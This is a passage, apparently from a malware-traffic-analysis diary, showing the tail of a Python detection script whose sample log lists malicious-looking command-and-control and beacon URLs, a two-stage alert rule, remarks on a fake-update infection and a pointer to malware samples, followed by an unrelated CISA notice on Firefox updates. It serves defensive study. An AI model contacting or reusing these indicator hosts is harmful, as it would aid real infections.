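    "2019-02-11T14:03:14Z 10.0.0.5 GET http://3aak.gotguardsecurity.com/topic/news.php?h=220&v=620228&z=de11cb81e3af84d1eb577864be7d7f2d",
    "2019-02-11T14:03:15Z 10.0.0.5 GET http://3aak.gotguardsecurity.com/chromefiles/chrome_logo_2x.png",
    "2019-02-11T14:03:40Z 10.0.0.5 POST http://6145fab0.static.spillpalletonline.com/pixel.gif?ss&ss1img",
    "2019-02-11T14:05:02Z 10.0.0.5 POST http://afroamericanec.bit/en/",
    "2019-02-11T14:03:20Z 10.0.0.9 GET http://news.example.org/topic/news.php?h=1&v=2&z=notahash",
    "2019-02-11T14:03:21Z 10.0.0.9 GET http://cdn.example.org/pixel.gif",
]

if __name__ == "__main__":
    print(stages_per_client(SAMPLE_LOG))
    print("alert:", alerts(SAMPLE_LOG))
```

Requiring two stages keeps a lone GET for a news.php or a single POST to pixel.gif from paging anyone; the .bit rule is the strongest single signal, since a corporate host has no legitimate reason to resolve a Namecoin domain.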

Final words

Monday’s infection was unusual, because everything except for the Dropbox URL was regular HTTP traffic.  I more often find HTTPS traffic from the compromised site, redirect traffic, and fake update page.  Usually the only HTTP traffic is generated by the downloaded .js file and final malware payload.

Pcap and malware samples for today’s diary can be found here.


Brad Duncan
brad [at] malware-traffic-analysis.net


Mozilla Releases Security Updates for Firefox


Original release date: February 12, 2019

Mozilla has released security updates to address vulnerabilities in Firefox and Firefox ESR. An attacker could exploit some of these vulnerabilities to take control of an affected system.

The National Cybersecurity and Communications Integration Center (NCCIC), part of the Cybersecurity and Infrastructure Security Agency (CISA), encourages users and administrators to review the Mozilla Security Advisories for Firefox 65.0.1 and Firefox ESR 60.5.1 and apply the necessary updates. 

